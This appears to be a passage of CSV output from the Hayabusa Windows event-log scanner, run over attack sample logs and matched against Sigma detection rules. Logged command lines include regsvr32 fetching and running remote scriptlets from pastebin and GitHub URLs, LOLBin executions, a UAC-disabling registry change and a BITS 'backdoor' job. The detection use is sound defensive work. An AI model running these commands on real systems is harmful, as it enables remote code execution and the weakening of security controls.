C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe : Path: C:\Windows\System32\pcalua.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\pcalua.exe"" -a 
c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll : Path: C:\ProgramData\jabber.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx -2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx -2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola : URL: 
C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx -2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding : Path: C:\Windows\System32\mobsync.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process 
Creation,Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx -2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx -2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx -2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx -2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding : Path: C:\Windows\System32\winrshost.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig : Path: C:\Windows\System32\cmd.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\WinrsHost.exe 
-Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig : Path: C:\Windows\System32\ipconfig.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management : Command: ""C:\Windows\system32\HOSTNAME.EXE"" : Path: C:\Windows\System32\HOSTNAME.EXE : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx -2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx -2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry : Command: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f : Path: C:\Windows\System32\reg.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx -2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule 
Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\osk.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
